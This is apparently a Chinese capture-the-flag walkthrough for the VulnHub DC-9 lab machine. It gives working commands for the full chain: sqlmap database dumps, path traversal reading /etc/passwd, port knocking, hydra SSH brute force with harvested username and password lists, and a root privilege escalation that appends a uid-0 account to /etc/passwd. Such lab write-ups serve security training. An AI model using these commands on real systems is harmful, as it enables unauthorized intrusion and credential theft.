赞
踩
kali和靶机都选择NAT模式(kali与靶机同网段)
下载链接:https://download.vulnhub.com/dc/DC-9.zip
命令:ifconfig
扫描靶机ip
sudo arp-scan -l
nmap -A -p- 192.168.101.122
它存在一个表单,在这里就很有可能存在着注入漏洞,所以我们先尝试着用sqlmap跑一下:
sqlmap -u "http://192.168.101.122/results.php" --data "search=1" --dbs#获取当前数据库
sqlmap -u "http://192.168.101.122/results.php" --data "search=1" -D users --tables# 获取表名
sqlmap -u"http://192.168.101.122/results.php" --data "search=1" -D users -T UserDetails --columns
#获取字段名
sqlmap -u "http://192.168.101.122/results.php" --data "search=1" -D users -T UserDetails -C username,password --dump #获取账号密码
查询数据库名
查询users数据库下面的表名
获取userDetails字段名获取员工的账号密码
这里是那些员工这账号和密码,后面可能会用到,先放着,然后再回过来爆另一个Staff数据库看看会有什么东西:
sqlmap -u "http://192.168.101.122/results.php" --data "search=1" -D Staff --tables
sqlmap -u "http://192.168.101.122/results.php" --data "search=1" -D Staff -T Users --dump
尝试用得到的用户密码登录
注意:File does not exist 这句话它说文件不存在
访问:http://192.168.101.122/manage.php?file=../../../../../../../../etc/passwd
访问:http://192.168.101.122/manage.php?file=../../../../../../../../etc/knockd.conf
发现ssh 自定义的端口号
for x in 7469 8475 9842; do nc 192.168.101.122 $x;done
nmap -sV -A 192.168.101.122 -p 22
nmap -p22 192.168.101.122
kali@kali:~$ vi password.txt
kali@kali:~$ cat password.txt
3kfs86sfd
468sfdfsd2
4sfd87sfd1
RocksOff
TC&TheBoyz
B8m#48sd
Pebbles
BamBam01
UrAG0D!
Passw0rd
yN72#dsd
ILoveRachel
3248dsds7s
smellycats
YR3BVxxxw87
Ilovepeepee
Hawaii-Five-0
kali@kali:~$ vi username.txt
kali@kali:~$ cat username.txt
marym
julied
fredf
barneyr
tomc
jerrym
wilmaf
bettyr
chandlerb
joeyt
rachelg
rossg
monicag
phoebeb
scoots
janitor
janitor2
hydra -L username.txt -P password.txt 192.168.101.122 ssh
ssh janitor@192.168.101.122
cd .secrets-for-putin
cat passwords-found-on-post-it-notes.txt
hydra -L username.txt -P password.txt 192.168.101.122 ssh
ssh fredf@192.168.101.122
sudo -l
如上图可知进入 /opt/devstuff/dist/test/test不需要密码,进入该目录下查看
cd /opt/devstuff
cat test.py
test.py是一个python脚本。它既然拥有root权限,那现在我们要做的就是构造一个拥有root权限的用户,并且在/etc/passwd文件中储存,只要使用这个用户登录后,就可以获取到root权限。
openssl passwd -1 -salt admin 111111
在靶机/opt/devstuff/dist/test目录下面创建一个叫swn的文件(随便命名) 再使用sudo用那个test程序来运行这个文件,随后切换成我们添加的这个用户,输入自己设定的密码就可以成功提权到root用户了,最后进入root目录下查看flag即可。
echo 'admin:$1$admin$2WRLhTGcIMgZ7OhwCpREK1:0:0::/root:/bin/bash' >> /tmp/swn
sudo ./test /tmp/swn /etc/passwd
su admin
cd /root
cat theflag.txt
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。